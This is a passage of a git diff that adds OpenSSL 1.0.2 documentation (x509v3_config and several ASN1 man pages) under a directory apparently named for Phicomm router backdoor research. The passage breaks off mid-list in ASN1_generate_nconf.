+L<x509v3_config(5)|x509v3_config(5)> 
+
+=head1 HISTORY
+
+Before OpenSSL 0.9.8, the default digest for RSA keys was MD5.
+
+The hash algorithm used in the B<-subject_hash> and B<-issuer_hash> options
+before OpenSSL 1.0.0 was based on the deprecated MD5 algorithm and the encoding
+of the distinguished name. In OpenSSL 1.0.0 and later it is based on a
+canonical version of the DN using SHA1. This means that any directories using
+the old form must have their links rebuilt using B<c_rehash> or similar. 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/x509v3_config.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/x509v3_config.pod
new file mode 100644
index 0000000..c82cea1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/x509v3_config.pod
@@ -0,0 +1,529 @@
+=pod
+
+=for comment openssl_manual_section:5
+
+=head1 NAME
+
+x509v3_config - X509 V3 certificate extension configuration format
+
+=head1 DESCRIPTION
+
+Several of the OpenSSL utilities can add extensions to a certificate or
+certificate request based on the contents of a configuration file.
+
+Typically the application will contain an option to point to an extension
+section. Each line of the extension section takes the form:
+
+ extension_name=[critical,] extension_options
+
+If B<critical> is present then the extension will be critical.
+
+The format of B<extension_options> depends on the value of B<extension_name>.
+
+There are four main types of extension: I<string> extensions, I<multi-valued>
+extensions, I<raw> and I<arbitrary> extensions.
+
+String extensions simply have a string which contains either the value itself
+or how it is obtained.
+
+For example:
+
+ nsComment="This is a Comment"
+
+Multi-valued extensions have a short form and a long form. The short form
+is a list of names and values:
+
+ basicConstraints=critical,CA:true,pathlen:1
+
+The long form allows the values to be placed in a separate section:
+
+ basicConstraints=critical,@bs_section
+
+ [bs_section]
+
+ CA=true
+ pathlen=1
+
+Both forms are equivalent.
+
+The syntax of raw extensions is governed by the extension code: it can
+for example contain data in multiple sections. The correct syntax to
+use is defined by the extension code itself: check out the certificate
+policies extension for an example.
+
+If an extension type is unsupported then the I<arbitrary> extension syntax
+must be used, see the L<ARBITRARY EXTENSIONS|/"ARBITRARY EXTENSIONS"> section for more details.
+
+=head1 STANDARD EXTENSIONS
+
+The following sections describe each supported extension in detail.
+
+=head2 Basic Constraints.
+
+This is a multi valued extension which indicates whether a certificate is
+a CA certificate. The first (mandatory) name is B<CA> followed by B<TRUE> or
+B<FALSE>. If B<CA> is B<TRUE> then an optional B<pathlen> name followed by an
+non-negative value can be included.
+
+For example:
+
+ basicConstraints=CA:TRUE
+
+ basicConstraints=CA:FALSE
+
+ basicConstraints=critical,CA:TRUE, pathlen:0
+
+A CA certificate B<must> include the basicConstraints value with the CA field
+set to TRUE. An end user certificate must either set CA to FALSE or exclude the
+extension entirely. Some software may require the inclusion of basicConstraints
+with CA set to FALSE for end entity certificates.
+
+The pathlen parameter indicates the maximum number of CAs that can appear
+below this one in a chain. So if you have a CA with a pathlen of zero it can
+only be used to sign end user certificates and not further CAs.
+
+
+=head2 Key Usage.
+
+Key usage is a multi valued extension consisting of a list of names of the
+permitted key usages.
+
+The supporte names are: digitalSignature, nonRepudiation, keyEncipherment,
+dataEncipherment, keyAgreement, keyCertSign, cRLSign, encipherOnly
+and decipherOnly.
+
+Examples:
+
+ keyUsage=digitalSignature, nonRepudiation
+
+ keyUsage=critical, keyCertSign
+
+
+=head2 Extended Key Usage.
+
+This extensions consists of a list of usages indicating purposes for which
+the certificate public key can be used for,
+
+These can either be object short names of the dotted numerical form of OIDs.
+While any OID can be used only certain values make sense. In particular the
+following PKIX, NS and MS values are meaningful:
+
+ Value			Meaning
+ -----			-------
+ serverAuth		SSL/TLS Web Server Authentication.
+ clientAuth		SSL/TLS Web Client Authentication.
+ codeSigning		Code signing.
+ emailProtection	E-mail Protection (S/MIME).
+ timeStamping		Trusted Timestamping
+ msCodeInd		Microsoft Individual Code Signing (authenticode)
+ msCodeCom		Microsoft Commercial Code Signing (authenticode)
+ msCTLSign		Microsoft Trust List Signing
+ msSGC			Microsoft Server Gated Crypto
+ msEFS			Microsoft Encrypted File System
+ nsSGC			Netscape Server Gated Crypto
+
+Examples:
+
+ extendedKeyUsage=critical,codeSigning,1.2.3.4
+ extendedKeyUsage=nsSGC,msSGC
+
+
+=head2 Subject Key Identifier.
+
+This is really a string extension and can take two possible values. Either
+the word B<hash> which will automatically follow the guidelines in RFC3280
+or a hex string giving the extension value to include. The use of the hex
+string is strongly discouraged.
+
+Example:
+
+ subjectKeyIdentifier=hash
+
+
+=head2 Authority Key Identifier.
+
+The authority key identifier extension permits two options. keyid and issuer:
+both can take the optional value "always".
+
+If the keyid option is present an attempt is made to copy the subject key
+identifier from the parent certificate. If the value "always" is present
+then an error is returned if the option fails.
+
+The issuer option copies the issuer and serial number from the issuer
+certificate. This will only be done if the keyid option fails or
+is not included unless the "always" flag will always include the value.
+
+Example:
+
+ authorityKeyIdentifier=keyid,issuer
+
+
+=head2 Subject Alternative Name.
+
+The subject alternative name extension allows various literal values to be
+included in the configuration file. These include B<email> (an email address)
+B<URI> a uniform resource indicator, B<DNS> (a DNS domain name), B<RID> (a
+registered ID: OBJECT IDENTIFIER), B<IP> (an IP address), B<dirName>
+(a distinguished name) and otherName.
+
+The email option include a special 'copy' value. This will automatically
+include and email addresses contained in the certificate subject name in
+the extension.
+
+The IP address used in the B<IP> options can be in either IPv4 or IPv6 format.
+
+The value of B<dirName> should point to a section containing the distinguished
+name to use as a set of name value pairs. Multi values AVAs can be formed by
+prefacing the name with a B<+> character.
+
+otherName can include arbitrary data associated with an OID: the value
+should be the OID followed by a semicolon and the content in standard
+L<ASN1_generate_nconf(3)|ASN1_generate_nconf(3)> format.
+
+Examples:
+
+ subjectAltName=email:copy,email:my@other.address,URI:http://my.url.here/
+ subjectAltName=IP:192.168.7.1
+ subjectAltName=IP:13::17
+ subjectAltName=email:my@other.address,RID:1.2.3.4
+ subjectAltName=otherName:1.2.3.4;UTF8:some other identifier
+
+ subjectAltName=dirName:dir_sect
+
+ [dir_sect]
+ C=UK
+ O=My Organization
+ OU=My Unit
+ CN=My Name
+
+
+=head2 Issuer Alternative Name.
+
+The issuer alternative name option supports all the literal options of
+subject alternative name. It does B<not> support the email:copy option because
+that would not make sense. It does support an additional issuer:copy option
+that will copy all the subject alternative name values from the issuer 
+certificate (if possible).
+
+Example:
+
+ issuserAltName = issuer:copy
+
+
+=head2 Authority Info Access.
+
+The authority information access extension gives details about how to access
+certain information relating to the CA. Its syntax is accessOID;location
+where I<location> has the same syntax as subject alternative name (except
+that email:copy is not supported). accessOID can be any valid OID but only
+certain values are meaningful, for example OCSP and caIssuers.
+
+Example:
+
+ authorityInfoAccess = OCSP;URI:http://ocsp.my.host/
+ authorityInfoAccess = caIssuers;URI:http://my.ca/ca.html
+
+
+=head2 CRL distribution points.
+
+This is a multi-valued extension whose options can be either in name:value pair
+using the same form as subject alternative name or a single value representing
+a section name containing all the distribution point fields.
+
+For a name:value pair a new DistributionPoint with the fullName field set to
+the given value both the cRLissuer and reasons fields are omitted in this case.
+
+In the single option case the section indicated contains values for each
+field. In this section:
+
+If the name is "fullname" the value field should contain the full name
+of the distribution point in the same format as subject alternative name.
+
+If the name is "relativename" then the value field should contain a section
+name whose contents represent a DN fragment to be placed in this field.
+
+The name "CRLIssuer" if present should contain a value for this field in
+subject alternative name format.
+
+If the name is "reasons" the value field should consist of a comma
+separated field containing the reasons. Valid reasons are: "keyCompromise",
+"CACompromise", "affiliationChanged", "superseded", "cessationOfOperation",
+"certificateHold", "privilegeWithdrawn" and "AACompromise".
+
+
+Simple examples:
+
+ crlDistributionPoints=URI:http://myhost.com/myca.crl
+ crlDistributionPoints=URI:http://my.com/my.crl,URI:http://oth.com/my.crl
+
+Full distribution point example:
+
+ crlDistributionPoints=crldp1_section
+
+ [crldp1_section]
+
+ fullname=URI:http://myhost.com/myca.crl
+ CRLissuer=dirName:issuer_sect
+ reasons=keyCompromise, CACompromise
+
+ [issuer_sect]
+ C=UK
+ O=Organisation
+ CN=Some Name
+
+=head2 Issuing Distribution Point
+
+This extension should only appear in CRLs. It is a multi valued extension
+whose syntax is similar to the "section" pointed to by the CRL distribution
+points extension with a few differences.
+
+The names "reasons" and "CRLissuer" are not recognized.
+
+The name "onlysomereasons" is accepted which sets this field. The value is
+in the same format as the CRL distribution point "reasons" field.
+
+The names "onlyuser", "onlyCA", "onlyAA" and "indirectCRL" are also accepted
+the values should be a boolean value (TRUE or FALSE) to indicate the value of
+the corresponding field.
+
+Example:
+
+ issuingDistributionPoint=critical, @idp_section
+
+ [idp_section]
+
+ fullname=URI:http://myhost.com/myca.crl
+ indirectCRL=TRUE
+ onlysomereasons=keyCompromise, CACompromise
+
+ [issuer_sect]
+ C=UK
+ O=Organisation
+ CN=Some Name
+
+
+=head2 Certificate Policies.
+
+This is a I<raw> extension. All the fields of this extension can be set by
+using the appropriate syntax.
+
+If you follow the PKIX recommendations and just using one OID then you just
+include the value of that OID. Multiple OIDs can be set separated by commas,
+for example:
+
+ certificatePolicies= 1.2.4.5, 1.1.3.4
+
+If you wish to include qualifiers then the policy OID and qualifiers need to
+be specified in a separate section: this is done by using the @section syntax
+instead of a literal OID value.
+
+The section referred to must include the policy OID using the name
+policyIdentifier, cPSuri qualifiers can be included using the syntax:
+
+ CPS.nnn=value
+
+userNotice qualifiers can be set using the syntax:
+
+ userNotice.nnn=@notice
+
+The value of the userNotice qualifier is specified in the relevant section.
+This section can include explicitText, organization and noticeNumbers
+options. explicitText and organization are text strings, noticeNumbers is a
+comma separated list of numbers. The organization and noticeNumbers options
+(if included) must BOTH be present. If you use the userNotice option with IE5
+then you need the 'ia5org' option at the top level to modify the encoding:
+otherwise it will not be interpreted properly.
+
+Example:
+
+ certificatePolicies=ia5org,1.2.3.4,1.5.6.7.8,@polsect
+
+ [polsect]
+
+ policyIdentifier = 1.3.5.8
+ CPS.1="http://my.host.name/"
+ CPS.2="http://my.your.name/"
+ userNotice.1=@notice
+
+ [notice]
+
+ explicitText="Explicit Text Here"
+ organization="Organisation Name"
+ noticeNumbers=1,2,3,4
+
+The B<ia5org> option changes the type of the I<organization> field. In RFC2459
+it can only be of type DisplayText. In RFC3280 IA5Strring is also permissible.
+Some software (for example some versions of MSIE) may require ia5org.
+
+=head2 Policy Constraints
+
+This is a multi-valued extension which consisting of the names
+B<requireExplicitPolicy> or B<inhibitPolicyMapping> and a non negative intger
+value. At least one component must be present.
+
+Example:
+
+ policyConstraints = requireExplicitPolicy:3
+
+
+=head2 Inhibit Any Policy
+
+This is a string extension whose value must be a non negative integer.
+
+Example:
+
+ inhibitAnyPolicy = 2
+
+
+=head2 Name Constraints
+
+The name constraints extension is a multi-valued extension. The name should
+begin with the word B<permitted> or B<excluded> followed by a B<;>. The rest of
+the name and the value follows the syntax of subjectAltName except email:copy
+is not supported and the B<IP> form should consist of an IP addresses and 
+subnet mask separated by a B</>.
+
+Examples:
+
+ nameConstraints=permitted;IP:192.168.0.0/255.255.0.0
+
+ nameConstraints=permitted;email:.somedomain.com
+
+ nameConstraints=excluded;email:.com
+
+
+=head2 OCSP No Check
+
+The OCSP No Check extension is a string extension but its value is ignored.
+
+Example:
+
+ noCheck = ignored
+
+
+=head1 DEPRECATED EXTENSIONS
+
+The following extensions are non standard, Netscape specific and largely
+obsolete. Their use in new applications is discouraged.
+
+=head2 Netscape String extensions.
+
+Netscape Comment (B<nsComment>) is a string extension containing a comment
+which will be displayed when the certificate is viewed in some browsers.
+
+Example:
+
+ nsComment = "Some Random Comment"
+
+Other supported extensions in this category are: B<nsBaseUrl>,
+B<nsRevocationUrl>, B<nsCaRevocationUrl>, B<nsRenewalUrl>, B<nsCaPolicyUrl>
+and B<nsSslServerName>.
+
+
+=head2 Netscape Certificate Type
+
+This is a multi-valued extensions which consists of a list of flags to be
+included. It was used to indicate the purposes for which a certificate could
+be used. The basicConstraints, keyUsage and extended key usage extensions are
+now used instead.
+
+Acceptable values for nsCertType are: B<client>, B<server>, B<email>,
+B<objsign>, B<reserved>, B<sslCA>, B<emailCA>, B<objCA>.
+
+
+=head1 ARBITRARY EXTENSIONS
+
+If an extension is not supported by the OpenSSL code then it must be encoded
+using the arbitrary extension format. It is also possible to use the arbitrary
+format for supported extensions. Extreme care should be taken to ensure that
+the data is formatted correctly for the given extension type.
+
+There are two ways to encode arbitrary extensions.
+
+The first way is to use the word ASN1 followed by the extension content
+using the same syntax as L<ASN1_generate_nconf(3)|ASN1_generate_nconf(3)>.
+For example:
+
+ 1.2.3.4=critical,ASN1:UTF8String:Some random data
+
+ 1.2.3.4=ASN1:SEQUENCE:seq_sect
+
+ [seq_sect]
+
+ field1 = UTF8:field1
+ field2 = UTF8:field2
+
+It is also possible to use the word DER to include the raw encoded data in any
+extension.
+
+ 1.2.3.4=critical,DER:01:02:03:04
+ 1.2.3.4=DER:01020304
+
+The value following DER is a hex dump of the DER encoding of the extension
+Any extension can be placed in this form to override the default behaviour.
+For example:
+
+ basicConstraints=critical,DER:00:01:02:03
+
+=head1 WARNING
+
+There is no guarantee that a specific implementation will process a given
+extension. It may therefore be sometimes possible to use certificates for
+purposes prohibited by their extensions because a specific application does
+not recognize or honour the values of the relevant extensions.
+
+The DER and ASN1 options should be used with caution. It is possible to create
+totally invalid extensions if they are not used carefully.
+
+
+=head1 NOTES
+
+If an extension is multi-value and a field value must contain a comma the long
+form must be used otherwise the comma would be misinterpreted as a field
+separator. For example:
+
+ subjectAltName=URI:ldap://somehost.com/CN=foo,OU=bar
+
+will produce an error but the equivalent form:
+
+ subjectAltName=@subject_alt_section
+
+ [subject_alt_section]
+ subjectAltName=URI:ldap://somehost.com/CN=foo,OU=bar
+
+is valid. 
+
+Due to the behaviour of the OpenSSL B<conf> library the same field name
+can only occur once in a section. This means that:
+
+ subjectAltName=@alt_section
+
+ [alt_section]
+
+ email=steve@here
+ email=steve@there
+
+will only recognize the last value. This can be worked around by using the form:
+
+ [alt_section]
+
+ email.1=steve@here
+ email.2=steve@there
+
+=head1 HISTORY
+
+The X509v3 extension code was first added to OpenSSL 0.9.2.
+
+Policy mappings, inhibit any policy and name constraints support was added in
+OpenSSL 0.9.8
+
+The B<directoryName> and B<otherName> option as well as the B<ASN1> option
+for arbitrary extensions was added in OpenSSL 0.9.8
+
+=head1 SEE ALSO
+
+L<req(1)|req(1)>, L<ca(1)|ca(1)>, L<x509(1)|x509(1)>,
+L<ASN1_generate_nconf(3)|ASN1_generate_nconf(3)>
+
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/c-indentation.el b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/c-indentation.el
new file mode 100644
index 0000000..90861d3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/c-indentation.el
@@ -0,0 +1,45 @@
+; This Emacs Lisp file defines a C indentation style that closely
+; follows most aspects of the one that is used throughout SSLeay,
+; and hence in OpenSSL.
+; 
+; This definition is for the "CC mode" package, which is the default
+; mode for editing C source files in Emacs 20, not for the older
+; c-mode.el (which was the default in less recent releaes of Emacs 19).
+;
+; Copy the definition in your .emacs file or use M-x eval-buffer.
+; To activate this indentation style, visit a C file, type
+; M-x c-set-style <RET> (or C-c . for short), and enter "eay".
+; To toggle the auto-newline feature of CC mode, type C-c C-a.
+;
+; Apparently statement blocks that are not introduced by a statement
+; such as "if" and that are not the body of a function cannot
+; be handled too well by CC mode with this indentation style,
+; so you have to indent them manually (you can use C-q tab).
+; 
+; For suggesting improvements, please send e-mail to bodo@openssl.org.
+
+(c-add-style "eay"
+	     '((c-basic-offset . 8)
+	       (indent-tabs-mode . t)
+	       (c-comment-only-line-offset . 0)
+	       (c-hanging-braces-alist)
+	       (c-offsets-alist	. ((defun-open . +)
+				   (defun-block-intro . 0)
+				   (class-open . +)
+				   (class-close . +)
+				   (block-open . 0)
+				   (block-close . 0)
+				   (substatement-open . +)
+				   (statement . 0)
+				   (statement-block-intro . 0)
+				   (statement-case-open . +)
+				   (statement-case-intro . +)
+				   (case-label . -)
+				   (label . -)
+				   (arglist-cont-nonempty . +)
+				   (topmost-intro . -)
+				   (brace-list-close . 0)
+				   (brace-list-intro . 0)
+				   (brace-list-open . +)
+				   ))))
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_OBJECT_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_OBJECT_new.pod
new file mode 100644
index 0000000..9bae40f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_OBJECT_new.pod
@@ -0,0 +1,45 @@
+=pod
+
+=head1 NAME
+
+ASN1_OBJECT_new, ASN1_OBJECT_free, - object allocation functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/asn1.h>
+
+ ASN1_OBJECT *ASN1_OBJECT_new(void);
+ void ASN1_OBJECT_free(ASN1_OBJECT *a);
+
+=head1 DESCRIPTION
+
+The ASN1_OBJECT allocation routines, allocate and free an
+ASN1_OBJECT structure, which represents an ASN1 OBJECT IDENTIFIER.
+
+ASN1_OBJECT_new() allocates and initializes a ASN1_OBJECT structure.
+
+ASN1_OBJECT_free() frees up the B<ASN1_OBJECT> structure B<a>.
+
+=head1 NOTES
+
+Although ASN1_OBJECT_new() allocates a new ASN1_OBJECT structure it
+is almost never used in applications. The ASN1 object utility functions
+such as OBJ_nid2obj() are used instead.
+
+=head1 RETURN VALUES
+
+If the allocation fails, ASN1_OBJECT_new() returns B<NULL> and sets an error
+code that can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+Otherwise it returns a pointer to the newly allocated structure.
+
+ASN1_OBJECT_free() returns no value.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<d2i_ASN1_OBJECT(3)|d2i_ASN1_OBJECT(3)>
+
+=head1 HISTORY
+
+ASN1_OBJECT_new() and ASN1_OBJECT_free() are available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_STRING_length.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_STRING_length.pod
new file mode 100644
index 0000000..f651e4f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_STRING_length.pod
@@ -0,0 +1,83 @@
+=pod
+
+=head1 NAME
+
+ASN1_STRING_dup, ASN1_STRING_cmp, ASN1_STRING_set, ASN1_STRING_length,
+ASN1_STRING_length_set, ASN1_STRING_type, ASN1_STRING_data, ASN1_STRING_to_UTF8 -
+ASN1_STRING utility functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/asn1.h>
+
+ int ASN1_STRING_length(ASN1_STRING *x);
+ unsigned char * ASN1_STRING_data(ASN1_STRING *x);
+
+ ASN1_STRING * ASN1_STRING_dup(ASN1_STRING *a);
+
+ int ASN1_STRING_cmp(ASN1_STRING *a, ASN1_STRING *b);
+
+ int ASN1_STRING_set(ASN1_STRING *str, const void *data, int len);
+
+ int ASN1_STRING_type(ASN1_STRING *x);
+
+ int ASN1_STRING_to_UTF8(unsigned char **out, ASN1_STRING *in);
+
+=head1 DESCRIPTION
+
+These functions allow an B<ASN1_STRING> structure to be manipulated.
+
+ASN1_STRING_length() returns the length of the content of B<x>.
+
+ASN1_STRING_data() returns an internal pointer to the data of B<x>.
+Since this is an internal pointer it should B<not> be freed or
+modified in any way.
+
+ASN1_STRING_dup() returns a copy of the structure B<a>.
+
+ASN1_STRING_cmp() compares B<a> and B<b> returning 0 if the two
+are identical. The string types and content are compared.
+
+ASN1_STRING_set() sets the data of string B<str> to the buffer
+B<data> or length B<len>. The supplied data is copied. If B<len>
+is -1 then the length is determined by strlen(data).
+
+ASN1_STRING_type() returns the type of B<x>, using standard constants
+such as B<V_ASN1_OCTET_STRING>.
+
+ASN1_STRING_to_UTF8() converts the string B<in> to UTF8 format, the
+converted data is allocated in a buffer in B<*out>. The length of
+B<out> is returned or a negative error code. The buffer B<*out>
+should be free using OPENSSL_free().
+
+=head1 NOTES
+
+Almost all ASN1 types in OpenSSL are represented as an B<ASN1_STRING>
+structure. Other types such as B<ASN1_OCTET_STRING> are simply typedefed
+to B<ASN1_STRING> and the functions call the B<ASN1_STRING> equivalents.
+B<ASN1_STRING> is also used for some B<CHOICE> types which consist
+entirely of primitive string types such as B<DirectoryString> and
+B<Time>.
+
+These functions should B<not> be used to examine or modify B<ASN1_INTEGER>
+or B<ASN1_ENUMERATED> types: the relevant B<INTEGER> or B<ENUMERATED>
+utility functions should be used instead.
+
+In general it cannot be assumed that the data returned by ASN1_STRING_data()
+is null terminated or does not contain embedded nulls. The actual format
+of the data will depend on the actual string type itself: for example
+for and IA5String the data will be ASCII, for a BMPString two bytes per
+character in big endian format, UTF8String will be in UTF8 format.
+
+Similar care should be take to ensure the data is in the correct format
+when calling ASN1_STRING_set().
+
+=head1 RETURN VALUES
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_STRING_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_STRING_new.pod
new file mode 100644
index 0000000..8ac2a03
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_STRING_new.pod
@@ -0,0 +1,46 @@
+=pod
+
+=head1 NAME
+
+ASN1_STRING_new, ASN1_STRING_type_new, ASN1_STRING_free -
+ASN1_STRING allocation functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/asn1.h>
+
+ ASN1_STRING * ASN1_STRING_new(void);
+ ASN1_STRING * ASN1_STRING_type_new(int type);
+ void ASN1_STRING_free(ASN1_STRING *a);
+
+=head1 DESCRIPTION
+
+ASN1_STRING_new() returns an allocated B<ASN1_STRING> structure. Its type
+is undefined.
+
+ASN1_STRING_type_new() returns an allocated B<ASN1_STRING> structure of
+type B<type>.
+
+ASN1_STRING_free() frees up B<a>.
+
+=head1 NOTES
+
+Other string types call the B<ASN1_STRING> functions. For example
+ASN1_OCTET_STRING_new() calls ASN1_STRING_type(V_ASN1_OCTET_STRING).
+
+=head1 RETURN VALUES
+
+ASN1_STRING_new() and ASN1_STRING_type_new() return a valid
+ASN1_STRING structure or B<NULL> if an error occurred.
+
+ASN1_STRING_free() does not return a value.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_STRING_print_ex.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_STRING_print_ex.pod
new file mode 100644
index 0000000..19c82ff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_STRING_print_ex.pod
@@ -0,0 +1,96 @@
+=pod
+
+=head1 NAME
+
+ASN1_STRING_print_ex, ASN1_STRING_print_ex_fp, ASN1_STRING_print - ASN1_STRING output routines.
+
+=head1 SYNOPSIS
+
+ #include <openssl/asn1.h>
+
+ int ASN1_STRING_print_ex(BIO *out, ASN1_STRING *str, unsigned long flags);
+ int ASN1_STRING_print_ex_fp(FILE *fp, ASN1_STRING *str, unsigned long flags);
+ int ASN1_STRING_print(BIO *out, ASN1_STRING *str);
+
+
+=head1 DESCRIPTION
+
+These functions output an B<ASN1_STRING> structure. B<ASN1_STRING> is used to
+represent all the ASN1 string types.
+
+ASN1_STRING_print_ex() outputs B<str> to B<out>, the format is determined by
+the options B<flags>. ASN1_STRING_print_ex_fp() is identical except it outputs
+to B<fp> instead.
+
+ASN1_STRING_print() prints B<str> to B<out> but using a different format to
+ASN1_STRING_print_ex(). It replaces unprintable characters (other than CR, LF)
+with '.'.
+
+=head1 NOTES
+
+ASN1_STRING_print() is a legacy function which should be avoided in new applications.
+
+Although there are a large number of options frequently B<ASN1_STRFLGS_RFC2253> is 
+suitable, or on UTF8 terminals B<ASN1_STRFLGS_RFC2253 & ~ASN1_STRFLGS_ESC_MSB>.
+
+The complete set of supported options for B<flags> is listed below.
+
+Various characters can be escaped. If B<ASN1_STRFLGS_ESC_2253> is set the characters
+determined by RFC2253 are escaped. If B<ASN1_STRFLGS_ESC_CTRL> is set control
+characters are escaped. If B<ASN1_STRFLGS_ESC_MSB> is set characters with the
+MSB set are escaped: this option should B<not> be used if the terminal correctly
+interprets UTF8 sequences.
+
+Escaping takes several forms.
+
+If the character being escaped is a 16 bit character then the form "\UXXXX" is used
+using exactly four characters for the hex representation. If it is 32 bits then
+"\WXXXXXXXX" is used using eight characters of its hex representation. These forms
+will only be used if UTF8 conversion is not set (see below).
+
+Printable characters are normally escaped using the backslash '\' character. If
+B<ASN1_STRFLGS_ESC_QUOTE> is set then the whole string is instead surrounded by
+double quote characters: this is arguably more readable than the backslash
+notation. Other characters use the "\XX" using exactly two characters of the hex
+representation.
+
+If B<ASN1_STRFLGS_UTF8_CONVERT> is set then characters are converted to UTF8
+format first. If the terminal supports the display of UTF8 sequences then this
+option will correctly display multi byte characters.
+
+If B<ASN1_STRFLGS_IGNORE_TYPE> is set then the string type is not interpreted at
+all: everything is assumed to be one byte per character. This is primarily for
+debugging purposes and can result in confusing output in multi character strings.
+
+If B<ASN1_STRFLGS_SHOW_TYPE> is set then the string type itself is printed out
+before its value (for example "BMPSTRING"), this actually uses ASN1_tag2str().
+
+The content of a string instead of being interpreted can be "dumped": this just
+outputs the value of the string using the form #XXXX using hex format for each
+octet.
+
+If B<ASN1_STRFLGS_DUMP_ALL> is set then any type is dumped.
+
+Normally non character string types (such as OCTET STRING) are assumed to be
+one byte per character, if B<ASN1_STRFLGS_DUMP_UNKNOWN> is set then they will
+be dumped instead.
+
+When a type is dumped normally just the content octets are printed, if 
+B<ASN1_STRFLGS_DUMP_DER> is set then the complete encoding is dumped
+instead (including tag and length octets).
+
+B<ASN1_STRFLGS_RFC2253> includes all the flags required by RFC2253. It is
+equivalent to:
+ ASN1_STRFLGS_ESC_2253 | ASN1_STRFLGS_ESC_CTRL | ASN1_STRFLGS_ESC_MSB |
+ ASN1_STRFLGS_UTF8_CONVERT | ASN1_STRFLGS_DUMP_UNKNOWN ASN1_STRFLGS_DUMP_DER
+
+=head1 SEE ALSO
+
+L<X509_NAME_print_ex(3)|X509_NAME_print_ex(3)>,
+L<ASN1_tag2str(3)|ASN1_tag2str(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_generate_nconf.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_generate_nconf.pod
new file mode 100644
index 0000000..bfa0a04
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ASN1_generate_nconf.pod
@@ -0,0 +1,265 @@
+=pod
+
+=head1 NAME
+
+ASN1_generate_nconf, ASN1_generate_v3 - ASN1 generation functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/asn1.h>
+
+ ASN1_TYPE *ASN1_generate_nconf(char *str, CONF *nconf);
+ ASN1_TYPE *ASN1_generate_v3(char *str, X509V3_CTX *cnf);
+
+=head1 DESCRIPTION
+
+These functions generate the ASN1 encoding of a string
+in an B<ASN1_TYPE> structure.
+
+B<str> contains the string to encode B<nconf> or B<cnf> contains
+the optional configuration information where additional strings
+will be read from. B<nconf> will typically come from a config
+file wherease B<cnf> is obtained from an B<X509V3_CTX> structure
+which will typically be used by X509 v3 certificate extension
+functions. B<cnf> or B<nconf> can be set to B<NULL> if no additional
+configuration will be used.
+
+=head1 GENERATION STRING FORMAT
+
+The actual data encoded is determined by the string B<str> and
+the configuration information. The general format of the string
+is:
+
+=over 2
+
+=item B<[modifier,]type[:value]>
+
+=back
+
+That is zero or more comma separated modifiers followed by a type
+followed by an optional colon and a value. The formats of B<type>,
+B<value> and B<modifier> are explained below.
+
+=head2 SUPPORTED TYPES
+
+The supported types are listed below. Unless otherwise specified
+only the B<ASCII> format is permissible.
+
+=over 2
+
+=item B<BOOLEAN>, B<BOOL>
+
+This encodes a boolean type. The B<value> string is mandatory and
+should be B<TRUE> or B<FALSE>. Additionally B<TRUE>, B<true>, B<Y>,
+B<y>, B<YES>, B<yes>, B<FALSE>, B<false>, B<N>, B<n>, B<NO> and B<no>
+are acceptable. 
+
+=item B<NULL>
+
+Encode the B<NULL> type, the B<value> string must not be present.
+
+=item B<INTEGER>, B<INT>
+
+Encodes an ASN1 B<INTEGER> type. The B<value> string represents
+the value of the integer, it can be prefaced by a minus sign and
+is normally interpreted as a decimal value unless the prefix B<0x>
+is included.
+
+=item B<ENUMERATED>, B<ENUM>
+
+Encodes the ASN1 B<ENUMERATED> type, it is otherwise identical to
+B<INTEGER>.
+
+=item B<OBJECT>, B<OID>
+
+Encodes an ASN1 B<OBJECT IDENTIFIER>, the B<value> string can be
+a short name, a long name or numerical format.
+
+=item B<UTCTIME>, B<UTC>
+
+Encodes an ASN1 B<UTCTime> structure, the value should be in
+the format B<YYMMDDHHMMSSZ>. 
+
+=item B<GENERALIZEDTIME>, B<GENTIME>
+
+Encodes an ASN1 B<GeneralizedTime> structure, the value should be in
+the format B<YYYYMMDDHHMMSSZ>. 
+
+=item B<OCTETSTRING>, B<OCT>
+
